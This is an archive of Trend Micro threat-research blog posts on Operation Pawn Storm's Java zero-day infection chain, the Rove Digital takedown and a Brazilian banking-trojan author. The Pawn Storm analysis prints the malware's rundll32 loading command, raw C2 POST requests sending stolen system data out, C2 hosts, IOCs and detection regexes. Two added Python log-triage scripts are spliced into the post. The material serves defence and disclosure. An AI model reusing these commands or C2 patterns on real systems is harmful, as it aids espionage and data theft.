    Author Archive - Trend Micro




    Our monitoring of Operation Pawn Storm has led us to an interesting finding: the domain we previously reported as hosting the Java 0-day used in the latest Pawn Storm campaign was modified to now lead to a Trend Micro IP address. Our investigations have shown that our systems have not been attacked or compromised. The attackers have simply redirected a DNS record to point to a Trend Micro IP address, likely in retaliation for our disclosure and the subsequent patching of the Oracle Java zero-day vulnerability they were exploiting.


    Figure 1. Changes in the Pawn Storm infection chain

    The DNS A record of the domain ausameetings[.]com now points to 216.104.20.189, an IP address of Trend Micro. While it was serving the zero-day exploit, the IP address of ausameetings[.]com was 95[.]215[.]45[.]189.


    Figure 2. DNS A record of ausameetings[.]com

    We are not sure when the domain was pointed to Trend Micro, but based on the DNS record naming convention, it was most likely modified to point to Trend Micro yesterday, July 14.

    We do not have clear evidence that points to the cause behind these developments, but we see the following possible motives:

    • To serve as a form of retaliation by the Pawn Storm operators against Trend Micro for disclosing details about their most recent campaign
    • To mislead network administrators into associating our IP address to the attack, possibly causing admins to mistakenly block it
    • To deceive security researchers into thinking that the Trend Micro IP address is compromised or being misused by Operation Pawn Storm

    It bears stressing that we found no traces of compromise or misuse. We will continue to monitor this and update this post as soon as there are relevant developments.

    Operation Pawn Storm is a campaign known to specifically target government organizations. One of its most recent campaigns targeted NATO members as well as the White House.

    We first discovered the Java 0-day being used in Operation Pawn Storm late last week. Oracle released a security update to address the vulnerability yesterday, July 14.

     
    Posted in Targeted Attacks |



    Operation Pawn Storm is a campaign known to target military, embassy, and defense contractor personnel from the United States and its allies. The attackers behind Operation Pawn Storm have been active since at least 2007 and they continue to launch new campaigns.

    Over the past year or so, we have seen numerous techniques and tactics employed by this campaign, such as the use of an iOS espionage app, and the inclusion of new targets like the White House. Through our on-going investigation and monitoring of this targeted attack campaign, we found suspicious URLs that hosted a newly discovered zero-day exploit in Java now identified by Oracle as CVE-2015-2590. This is the first time in nearly two years that a new Java zero-day vulnerability was reported.

    The report below outlines the traffic observed as part of the attack, not the exploit itself. Our blog entry on how the exploit itself works can be found here. This blog entry is intended to help readers identify traffic in their network that would indicate if such an exposure had occurred. We strongly recommend that all readers roll out the Oracle patch as soon as possible.

    Infection sequence

    Trend Micro has observed that an entity belonging to the target profile received an email that contains the following URL:

    • hxxp://ausameetings[.]com/url?={BLOCKED}/2015annualmeeting/

    It is worth noting that the spearphishing domain used is ausameetings[.]com, a play on the valid domain “ausameetings.org,” which is a site for AUSA’s (Association of the United States Army) annual exposition, commonly held in mid-October. The domain was only registered last July 8, which implies a one-time use for a specific set of targets.

    When assessing this URL, it was determined that the most probable infection sequence is:

    Figure 1. Infection chain

    Like all multi-stage infections, a successful execution of the previous stage is required before moving to the next stage down. In Stage 1, the sequence is initiated by clicking on the URL embedded within the victim’s spearphishing email.

    Once the Java exploit of Stage 1 is successful, it downloads the PE file (Stage 2). Once the PE file is downloaded and executed, it drops and runs the DLL file (Stage 3), which is the final component to infect the machine with SEDNIT.

    The information that we have on each of these steps is as follows.
    Further information on each of these stages can be found in the sections below.

    | Stage | Type | SHA1 | File Name | File Size | Trend Micro Detection |
    |---|---|---|---|---|---|
    | Stage 1 | Java Exploit | 95dc765700f5af406883d07f165011d2ff8dd0fb | Spearphishing URL matching hxxp://ausameetings[.]com/url?=[a-zA-Z0-9]{7}/2015annualmeeting/ | | JAVA_DLOADR.EFD |
    | Stage 2 | PE | b4a515ef9de037f18d96b9b0e48271180f5725b7 | Drops as cormac.mcr; end resulting file on host system as vhgg5hkvn25.exe | 1,619,968 bytes | TROJ_DROPPR.CXC |
    | Stage 3 | DLL | 21835aafe6d46840bb697e8b0d4aac06dec44f5b | api-ms-win-downlevel-profile-l1-1-0.dll | 40,960 bytes | TSPY_SEDNIT.C |

    Stage 1 – the Java exploit

    The first stage of the infection sequence comes through a targeted, spearphishing attempt against the victim, which is the observed method for Operation Pawn Storm attacks.

    The initial spearphishing URL is constructed similarly to:

    • hxxp://ausameetings[.]com/url?=[a-zA-Z0-9]{7}/2015annualmeeting/

    The web pages on this domain that were found to drop the Java zero-day exploit include:

    • 1_2015annualmeeting index.htm (19,225 bytes) – detected as HTML_JNLPER.HAQ
    • 3_544306 index.htm (4,077 bytes) – detected as HTML_JNLPER.HAQ

    The network traffic observed for the infection sequence of this stage is:

    1. Send the initial POST as per the spearphishing email to ausameetings[.]com, which includes the 2015annualmeeting URI path.
    2. Send an encoded POST call, which, when decoded, is the variable to construct the subsequently used URI path. This is particularly interesting as it appears that each URI path on the malicious server is customized by the victim’s infection, rather than static on the web server.
    3. The victim machine then does a variety of GET calls to pull down JPG, JNLP, and Java class files.
    4. If the Java class files cannot be found on the primary domain (ausameetings[.]com), it appears to instead attempt to get these files from a hardcoded IP (87[.]236[.]215[.]132).
    5. Once the class files are downloaded, the victim machine then does a GET call to fetch the file cormac.mcr. This file is the PE file for Stage 2.

    For completeness, the specific traffic calls observed relating to Stage 1 include the following:

    | Result | Protocol | Host | URL | Size | Content-Type |
    |---|---|---|---|---|---|
    | 200 | HTTP | ausameetings[.]com | /url?={BLOCKED}/2015annualmeeting/ | 19,225 | text/html; charset=utf-8 |
    | 200 | HTTP | ausameetings[.]com | /VFlmsRH/7311/4388/558923/?p2=KlW2HlMf&c=BMjNiBV&recr=Wr1mI7&p3=364397021&as=SAUmj&c=GY9oCdQ& | 22 | text/html; charset=utf-8 |
    | 200 | HTTP | ausameetings[.]com | /url/544036/ | 4,077 | text/html; charset=utf-8 |
    | 200 | HTTP | ausameetings[.]com | /url/544036/line.jpg | 22,500 | text/html; charset=utf-8 |
    | 200 | HTTP | ausameetings[.]com | /url/544036/right.jpg | 97,247 | text/html; charset=utf-8 |
    | 200 | HTTP | ausameetings[.]com | /url/544036/init.jnlp | 562 | application/x-java-jnlp-file |
    | 200 | HTTP | ausameetings[.]com | /url/544036/ | 4,077 | text/html; charset=utf-8 |
    | 200 | HTTP | ausameetings[.]com | /url/544036/jndi.properties | 125 | text/html; charset=utf-8 |
    | 404 | HTTP | ausameetings[.]com | /url/544036/Go.class | 0 | text/html; charset=utf-8 |
    | 200 | HTTP | 87[.]236[.]215[.]132 | /2/Go.class | 1,373 | text/html; charset=utf-8 |
    | 404 | HTTP | 87[.]236[.]215[.]132 | /crossdomain.xml | 0 | text/html; charset=utf-8 |
    | 200 | HTTP | 87[.]236[.]215[.]132 | /2/App.class | 7,552 | text/html; charset=utf-8 |
    | 200 | HTTP | 87[.]236[.]215[.]132 | /2/Help.class | 5,667 | text/html; charset=utf-8 |
    | 200 | HTTP | 87[.]236[.]215[.]132 | /2/PhantomSuper.class | 763 | text/html; charset=utf-8 |
    | 200 | HTTP | 87[.]236[.]215[.]132 | /2/ArrayReplace.class | 729 | text/html; charset=utf-8 |
    | 200 | HTTP | 87[.]236[.]215[.]132 | /2/App$PassHandleController.class | 980 | text/html; charset=utf-8 |
    | 200 | HTTP | 87[.]236[.]215[.]132 | /2/Converter.class | 2,820 | text/html; charset=utf-8 |
    | 200 | HTTP | 87[.]236[.]215[.]132 | /2/MyByteArrayInputStream.class | 1,282 | text/html; charset=utf-8 |
    | 404 | HTTP | 87[.]236[.]215[.]132 | /2/pkg/None2.class | 0 | text/html; charset=utf-8 |
    | 404 | HTTP | 87[.]236[.]215[.]132 | /2/pkg/None.class | 0 | text/html; charset=utf-8 |
    | 200 | HTTP | ausameetings[.]com | /url/544036/cormac.mcr | 1,619,968 | application/octet-stream |
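
The fallback described in step 4 leaves a recognisable sequence in proxy logs: a 404 for a .class file from the named host, followed by a 200 for the same file name from a bare IP address. The following is an added example (not Trend Micro's code) that flags that sequence and then records every class file the fallback IP serves to the same client. The log tuple layout, the client addresses and the rows for 10.0.0.9 are constructed for illustration, and Host values are assumed to carry no port.

```python
import ipaddress
import posixpath
from collections import defaultdict

# (client, status, host, path). Rows for client 10.0.0.5 are copied from the
# Stage 1 traffic table on this page (hosts left defanged as published); the
# client addresses and the rows for 10.0.0.9 are constructed for the example.
SAMPLE_LOG = [
    ("10.0.0.5", 200, "ausameetings[.]com", "/url/544036/init.jnlp"),
    ("10.0.0.5", 200, "ausameetings[.]com", "/url/544036/jndi.properties"),
    ("10.0.0.5", 404, "ausameetings[.]com", "/url/544036/Go.class"),
    ("10.0.0.9", 404, "intranet.example", "/applets/Chart.class"),
    ("10.0.0.5", 200, "87[.]236[.]215[.]132", "/2/Go.class"),
    ("10.0.0.9", 200, "mirror.example", "/applets/Chart.class"),
    ("10.0.0.5", 200, "87[.]236[.]215[.]132", "/2/App.class"),
    ("10.0.0.5", 200, "87[.]236[.]215[.]132", "/2/Help.class"),
    ("10.0.0.5", 404, "87[.]236[.]215[.]132", "/2/pkg/None.class"),
    ("10.0.0.5", 200, "ausameetings[.]com", "/url/544036/cormac.mcr"),
]


def refang(host):
    """Turn a published, defanged host (1[.]2[.]3[.]4) back into literal form."""
    return host.replace("[.]", ".")


def is_ip_literal(host):
    """True when the Host value is a bare IP address rather than a DNS name."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def find_class_fallbacks(rows):
    """Return {(client, ip): [class files]} for clients that got a 404 for a
    .class file from a named host and then fetched that file from a bare IP."""
    missed = {}                   # (client, file name) -> host that returned 404
    fallback = defaultdict(list)  # (client, ip) -> class files served by that IP
    for client, status, host, path in rows:
        host = refang(host)
        name = posixpath.basename(path)
        if not name.endswith(".class"):
            continue
        if is_ip_literal(host):
            key = (client, host)
            # Start tracking an IP only when it serves a file the named host
            # lacked; after that, record every class file it serves the client.
            if status == 200 and ((client, name) in missed or key in fallback):
                fallback[key].append(name)
        elif status == 404:
            missed[(client, name)] = host
    return dict(fallback)


if __name__ == "__main__":
    for (client, ip), files in find_class_fallbacks(SAMPLE_LOG).items():
        print(f"{client} fell back to {ip} for: {', '.join(files)}")
```
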

    Trend Micro detects these Java class files as JAVA_DLOADR.EFD:

    • App.class (7,552 bytes)
    • Go.class (1,373 bytes)
    • Help.class (5,667 bytes)

    The second and third traffic calls in the traffic pattern are particularly interesting to note.


    Figure 2. Traffic patterns

    One can observe that the second call sends a POST to ausameetings[.]com and is returned a text response, which is then used as the URI path for the subsequent HTTP requests.

    Stage 2 – The PE file

    Stage 2 involves downloading a PE file. Trend Micro detects this file as TROJ_DROPPR.CXC. The primary purpose of this PE is to drop and load the DLL executable. It is downloaded as Cormac.mcr, but once extracted, the file name is converted into a randomized file name. It is installed into the %USERPROFILE% directory and then executed, creating a service by the same name.

    During its installation, a variety of other services also appear to be hooked, including lsass, lsm, and conhost, amongst others.


    Figure 3. Observed processes

    Once the malware is executed, it will drop the Stage 3 DLL file with filename api-ms-win-downlevel-profile-l1-1-0.dll in the %TEMP% directory. To load the malware, it executes rundll32.exe using the following command:

    • rundll32.exe "%temp%/api-ms-win-downlevel-profile-l1-1-0.dll",init

    Stage 3 – The DLL file

    This third stage involves a DLL file, which we detect as TSPY_SEDNIT.C. When the PE file triggers the DLL (in this instance, %windir%\system32\RunDll32.exe, with the command "%windir%\system32\RunDll32.exe" "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\api-ms-win-downlevel-profile-l1-1-0.dll",init), the following traffic was observed.

    1. POST /ESL/YxF8bM/f/MFS.pdf/?duJ=OJYKZRlzy1tddcpaKjU= HTTP/1.1
       Content-Type: application/x-www-form-urlencoded
       Host: www.google.com
       Content-Length: 0
       Note: Assumed to be a local connectivity test traffic call.

    2. POST /RGLw/ofEK/5w2a.htm/?6=9SpyZtTPs1iQybJZ54k= HTTP/1.1
       Content-Type: application/x-www-form-urlencoded
       Host: 192[.]111[.]146[.]185
       Content-Length: 830

    3. POST /hP/Bo/S/2z.htm/?WDC=TJrXZm1/FlgpeRdZXjk= HTTP/1.1
       Content-Type: application/x-www-form-urlencoded
       Host: www.google.com
       Content-Length: 0
       Note: Assumed to be a local connectivity test traffic call.

    4. POST /C9zl/LJ9.zip/?hP=mLgAZ7ldwVn9W8BYihs= HTTP/1.1
       Content-Type: application/x-www-form-urlencoded
       Host: 192[.]111[.]146[.]185
       Content-Length: 0

    5. POST /k9/eR3/a/UE/eR.pdf/?bKC=xCCmnuXFZ6Chw2ah1oM= HTTP/1.1
       Content-Type: application/x-www-form-urlencoded
       Host: 192[.]111[.]146[.]185
       Content-Length: 26

    It bears stressing that we do not encourage using the data presented above as IOCs for your own analysis. The network traffic generated by this stage was a challenge to assess as it appears to have polymorphic capabilities in the creation of URI paths utilized to pull down files. After assessing the samples multiple times, each network traffic infection sequence appeared to be different, no matter what sequence of testing was performed (e.g., same machine, different machines, different geographic IP space globally, etc.).

    After detailed network forensics of the traffic, it was determined that no single stable URL path or URI query component (URI path component, file name, or URI query parameter) showed a consistent pattern (neither an identical entry nor a regex-definable pattern), and further reverse engineering was required to determine the methods used to achieve this.

    As a result of this additional analysis, it was determined that the URI path is a randomly generated string with the following pattern:

    • ^/([a-zA-Z0-9]{1,6}/){1,5}[a-zA-Z0-9]{1,7}\.(xml|pdf|htm|zip)/\?[a-zA-Z0-9]{1,3}=<Encoded ID>

    Figure 4. Regex expression
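
The pattern above is broad enough to match unrelated traffic, so the following added example (not Trend Micro's code) applies it to POST requests only and raises confidence when one client sends matching requests both to the connectivity-test host seen in the capture and to another host. The page does not define <Encoded ID>, so a Base64-alphabet token is assumed; the tuple layout, client addresses, the pairing heuristic and the rows for 10.0.0.7 and 10.0.0.8 are constructed for illustration.

```python
import re
from collections import defaultdict

# URI pattern from Figure 4. <Encoded ID> is not defined on the page; a
# Base64-alphabet token is assumed, which fits the five observed requests.
STAGE3_URI = re.compile(
    r"^/([a-zA-Z0-9]{1,6}/){1,5}[a-zA-Z0-9]{1,7}\.(xml|pdf|htm|zip)/"
    r"\?[a-zA-Z0-9]{1,3}=(?P<encoded_id>[A-Za-z0-9+/]+={0,2})$"
)

# Host that received the same URI pattern with an empty body in the capture
# ("assumed to be a local connectivity test traffic call").
CONNECTIVITY_HOSTS = {"www.google.com"}

# (client, method, host, uri). The 10.0.0.5 rows are the five requests listed
# above (hosts left defanged); all other rows and addresses are constructed.
SAMPLE = [
    ("10.0.0.5", "POST", "www.google.com", "/ESL/YxF8bM/f/MFS.pdf/?duJ=OJYKZRlzy1tddcpaKjU="),
    ("10.0.0.5", "POST", "192[.]111[.]146[.]185", "/RGLw/ofEK/5w2a.htm/?6=9SpyZtTPs1iQybJZ54k="),
    ("10.0.0.5", "POST", "www.google.com", "/hP/Bo/S/2z.htm/?WDC=TJrXZm1/FlgpeRdZXjk="),
    ("10.0.0.5", "POST", "192[.]111[.]146[.]185", "/C9zl/LJ9.zip/?hP=mLgAZ7ldwVn9W8BYihs="),
    ("10.0.0.5", "POST", "192[.]111[.]146[.]185", "/k9/eR3/a/UE/eR.pdf/?bKC=xCCmnuXFZ6Chw2ah1oM="),
    ("10.0.0.7", "GET", "docs.example", "/files/report.pdf"),
    ("10.0.0.7", "POST", "app.example", "/api/v1/login"),
    # Benign-looking request that still satisfies the pattern: a false positive
    # if the regex is used on its own.
    ("10.0.0.8", "POST", "portal.example", "/dl/a1.zip/?k=YWJjZA=="),
]


def encoded_id(method, uri):
    """Return the encoded-ID token if a POST URI fits the pattern, else None."""
    if method != "POST":
        return None
    match = STAGE3_URI.match(uri)
    return match.group("encoded_id") if match else None


def triage(rows):
    """Group pattern-matching POSTs by client and grade each client.

    'high': the client hit a connectivity-test host and some other host with
    the same URI shape; 'low': the pattern matched but without that pairing.
    """
    hosts = defaultdict(set)
    for client, method, host, uri in rows:
        if encoded_id(method, uri) is not None:
            hosts[client].add(host.replace("[.]", "."))  # refang for reporting
    report = {}
    for client, seen in hosts.items():
        paired = bool(seen & CONNECTIVITY_HOSTS) and bool(seen - CONNECTIVITY_HOSTS)
        report[client] = {"confidence": "high" if paired else "low",
                          "hosts": sorted(seen)}
    return report


if __name__ == "__main__":
    for client, verdict in triage(SAMPLE).items():
        print(client, verdict["confidence"], verdict["hosts"])
```
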

    Included in the POST request is data encoded with Base64 and XOR encryption. The encoded data contains the following system information of the infected machine:

    • OS Version
    • List of running processes
    • Hard Disk Drive Information
    • Volume Serial Number

    TSPY_SEDNIT.C connects to three C&C servers:

    • 192[.]111[.]146[.]185 (direct to IP call)
    • www[.]acledit[.]com
    • www[.]biocpl[.]org

    After sending the encrypted data, it will wait for a reply, which is encrypted by the same algorithm above.

    Phase 2 of the attack: the keystroke logger

    Based on our investigation of Operation Pawn Storm, we know that the infection happens in two stages:

    • In phase 1, opening the email attachment or clicking on the malicious URI initiates the download of the first level dropper, which installs the downloader component (.DLL file).
    • In phase 2, the downloader component communicates with a C&C server and downloads other components, and at the end of the chain a keylogger is installed. The keylogger sends data back to the C&C server.

    As of writing, we have not succeeded in triggering Phase 2, which will download a fourth stage malware from the C&C servers. This fourth stage malware is expected to be an encrypted executable file.

    Victims of the Attack

    A number of victims were identified during the course of our investigation. The targets are in the United States or Canada, and those we were able to identify via IP are big defense contractors, as is typical for Operation Pawn Storm.

    Countermeasures

    Trend Micro is already able to protect users against this threat without any necessary updates. The existing Sandbox with Script Analyzer engine, which is part of Trend Micro™ Deep Discovery, can be used to detect this threat by its behavior. The Browser Exploit Prevention feature in the Endpoint Security in Trend Micro™ Smart Protection Suite detects the exploit once the user accesses the URL that hosted it. Our Browser Exploit Prevention protects user systems against exploits targeting browsers or related plugins.

    Vulnerability protection in Trend Micro Deep Security protects user systems from threats that may leverage this vulnerability with the following DPI rule:

    • 1006857 – Oracle Java SE Remote Code Execution Vulnerability

    Oracle has also provided a security patch for the related vulnerability.

    Indicators of Compromise

    The following table summarizes the identified stable IOCs that can be used to search for this attack. The “Precision” column indicates how close to the direct parameter the indicator is, inversely indicating likelihood of collateral false positives.

    | Stage | Type | Indicator | Precision |
    |---|---|---|---|
    | Infection Sequence – Stage 1 | Domain | ausameetings[.]com | High |
    | Infection Sequence – Stage 1 | Domain_IP | 95[.]215[.]45[.]189 | Low |
    | Infection Sequence – Stage 1 | IP | 87[.]236[.]215[.]132 | High |
    | Infection Sequence – Stage 1 | URIPath_FileName | ArrayReplace.class | Medium |
    | Infection Sequence – Stage 1 | URIPath_FileName | App$PassHandleController.class | Medium |
    | Infection Sequence – Stage 1 | URIPath_FileName | Converter.class | Medium |
    | Infection Sequence – Stage 1 | URIPath_FileName | MyByteArrayInputStream.class | Medium |
    | Infection Sequence – Stage 1 | URIPath_FileName | None2.class | Medium |
    | Infection Sequence – Stage 1 | URIPath_FileName | None.class | Medium |
    | Infection Sequence – Stage 1->2 | URIPath_FileName | cormac.mcr | High |
    | Infection Sequence – Stage 3 | | 192[.]111[.]146[.]185 | High |
    | Infection Sequence – Stage 3 | IP_DirectCall | 37[.]187[.]116[.]240 | High |
    | Infection Sequence – Stage 3 | Domain | www[.]acledit[.]com | High |
    | Infection Sequence – Stage 3 | Domain | www[.]biocpl[.]org | High |

    Other posts related to Operation Pawn Storm can be found here:

    Updated on July 15, 2015, 9:57AM PDT (UTC-7) to include revised detection name for DLL file and clarifications to the infection flow.

    Updated on July 15, 2015, 1:15PM PDT (UTC-7) to include more details about the infection flow.

    Updated on July 16, 2015 1:36PM PDT (UTC-7) to include screenshots of running processes.

     



    Oracle has released its Critical Patch Update for the month of July. The update provides fixes for 193 new security vulnerabilities, including the recently announced zero-day vulnerability first reported by Trend Micro researchers. What makes the zero-day discovery more notable is that it is being used in an ongoing targeted attack campaign, Operation Pawn Storm. This particular vulnerability was designated as CVE-2015-2590.

    Trend Micro first came across this vulnerability (and exploit) as part of our ongoing investigations on Operation Pawn Storm. We found email messages targeting the armed forces of a certain NATO country and a US defense organization; these messages contained the malicious URLs where the Java exploit is hosted. This exploit sets off a chain of malware infections that lead to its final payload: an information-stealing malware.

    More details about the connections between Pawn Storm and this vulnerability will be made available in an upcoming blog entry.

    We recommend users install the latest security fix from Java immediately.

    Trend Micro is already able to protect users against exploits targeting this vulnerability without any necessary updates. The existing Sandbox with Script Analyzer engine, which is part of Trend Micro™ Deep Discovery, can be used to detect this threat by its behavior. The Browser Exploit Prevention feature in the Endpoint Security in Trend Micro™ Smart Protection Suite detects the exploit once the user accesses the URL that hosted it. Our Browser Exploit Prevention protects user systems against exploits targeting browsers or related plugins.

    Vulnerability protection in Trend Micro Deep Security protects user systems from threats that may leverage this vulnerability with the following DPI rule:

    • 1006857 – Oracle Java SE Remote Code Execution Vulnerability
     
    Posted in Vulnerabilities |



    In November 2011 the Federal Bureau of Investigation (FBI), with the help of the Trend Micro Forward-looking Threat Researchers, conducted what was, at the time, the largest takedown in the history of online crime.

    Known as “Operation Ghost Click,” by the FBI, more than a hundred servers belonging to the Esthost/Rove Digital group were taken offline. The group’s data centers in New York and Chicago were raided and more than 4 million victims were given over half a year to change over to non-malicious DNS servers.

    Almost four years after the takedown, the leader of this particular cybercrime group, Vladimir Tsastsin, has pleaded guilty to various charges before a US federal magistrate. He now faces up to six years in a US federal penitentiary.

    At its heart, the Esthost/Rove Digital scheme was a relatively simple one: plant DNS changer malware onto user systems and redirect queries for popular domains to malicious servers. This allowed the attackers to redirect the traffic aimed at these domains and carry out hard-to-detect but profitable attacks like hijacking search results and replacing website advertising. In addition to this, fake antivirus malware was also an important source of revenue for this organization.

    The attackers favored these methods as they were relatively difficult to detect and could be sustained for a long time. However, the group’s activities were already something that Trend Micro was aware of as early as 2006; even then we were already keeping track of their activities.

    In 2009, law enforcement agencies in Estonia and the United States began working with other organizations to help bring the activities of Esthost/Rove Digital to a halt; Trend Micro was the only antivirus company that joined this joint effort.

    Our research paper The Rove Digital Takedown summarizes our knowledge of this group in a single document.

    Our research on the takedown was an essential part of the case against Esthost/Rove Digital, and was indispensable to putting Tsastsin in jail.

    Tsastsin, before his arrest

    Six leaders of the scheme were arrested at the time of the takedown, including its mastermind Vladimir Tsastsin. It was not until late 2014 that he was extradited to the United States and formally charged. With his guilty plea, Tsastsin’s trial now moves on to sentencing. He faces up to six years in prison, with a sentence set to be handed down in October.

    Time and the courts have caught up to Tsastsin. This highlights how Trend Micro is committed to working with law enforcement agencies from across the world to help stamp out cybercrime and make the world safer for users.

    Our Forward-looking Threat Researchers, including Feike Hacquebord, who was a key part of this investigation, have worked side-by-side with law enforcement agencies across the world to help root out various cybercrime organizations.

    Collaboration between the private sector and law enforcement is a subject that we have talked about before and our position on this has been consistent for quite some time. As a company, we remain committed to helping bring cybercriminals to justice before the appropriate judicial systems.
     
    Posted in Malware |



    A 20-year-old college student whose underground username is Lordfenix has become one of Brazil’s top banking malware creators. Lordfenix developed his underground reputation by creating more than a hundred online banking Trojans, each valued at over US$300. Lordfenix is the latest in a string of young and notorious solo cybercriminals we’re seeing today.

    Who is Lordfenix?

    Lordfenix is a 20-year-old Computer Science student from Tocantins, Brazil. We were able to trace his activity back to April 2013. At the time, he was operating under a different handle, Filho de Hakcer (Portuguese for “hacker’s son,” but misspelled). He was posting in forums, asking for programming assistance for a Trojan he was supposedly creating.

    Figure 1. Forum post of Lordfenix, then Filho de Hakcer

    Based on a photo he posted on Facebook dated September 2013, it appears he was successful in his work.

    Figure 2. Facebook post boasting of his success with his Trojan

    Information theft via fake browsers

    Lordfenix has since continued to develop and sell banking Trojans, one of which we detect as TSPY_BANKER.NJH. This Trojan is able to identify when a user types any of its target banks’ URLs. Among these targets are Banco de Brasil, Caixa, and HSBC Brasil.

    It is then able to close the current browser window (if it’s running on Google Chrome), display an error message, and then open a new fake Chrome window. This whole routine is almost unnoticeable since the browser windows are switched seamlessly. In case the user’s browser is Internet Explorer or Firefox, the original window stays open, but the error message and the fake browser window still appear.

    Figure 3. Fake browser window

    Figure 4. Spoofed HSBC Brasil banking site

    Figure 5. Spoofed Banco de Brasil banking site

    If the user enters his login credentials in the fake window, the malware sends the information back to the attacker via email—the same email address Lordfenix used during his “Filho de Hakcer” days.

    For added protection against security products, this malware terminates the process GbpSV.exe. This process is associated with the software G-Buster Browser Defense, a security program many Brazilian banks use to defend against information theft and protect their customers’ privacy during online transactions.

    Cybercrime for free

    Lordfenix has grown quite confident in his skills. We found him offering free versions of fully-functional banking Trojan source code to underground forum members. He claims these free versions can steal credentials from customers of four different banks. But this generosity has a limit. If other members would like to target more banks, they would have to contact him, and he would sell them TSPY_BANKER.NJH. We checked this banking Trojan and it is, in fact, operational.

    Figure 6. Forum post advertising free banking Trojan source code

    We also found him advertising banking Trojans through his Skype profile. There, the Trojans are referred to as keylogger (KL) proxy—based on the keylogging capabilities of the malware.

    Figure 7. Lordfenix’s Skype profile

    Cybercriminal upstart

    Based on our research, Lordfenix has created more than 100 different banking Trojans, not including his other malicious tools, since April 2013. With each Trojan costing around R$1,000 (roughly US$320), this young cybercriminal channeled his talent in programming into a lucrative, illegal venture.

    Aside from the ease of creating malware, a few other factors may have urged Lordfenix to start up his own little enterprise:

    • Brazil has a huge online banking user base. In 2013 alone, around 51% of all banking transactions within the country were done via the Internet.
    • Digital crime is not necessarily a top priority in Brazil. The penalties against offenders are currently very low.

    Despite working alone and being only 20 years old, Lordfenix has managed to make his name known among his fellow criminals. His story—the young cybercriminal inflicting serious damage—is near-identical to that of the teens developing mobile ransomware in China. He is also not the first solo operator we have noted this quarter. The likes of Frapstar (Canada) and the cybercriminals behind FighterPOS (Brazil) and HawkEye (Nigeria) are all individual players using basic malware to gain profit.

    In cybercrime, it doesn’t matter if the criminal is a veteran or a newbie. The result remains the same: ordinary users become victims.

    Update as of July 10, 2015, 11:45 AM PDT (UTC – 7)

    Below are the SHA1 hashes related to this threat:

     
    Posted in Malware |


     
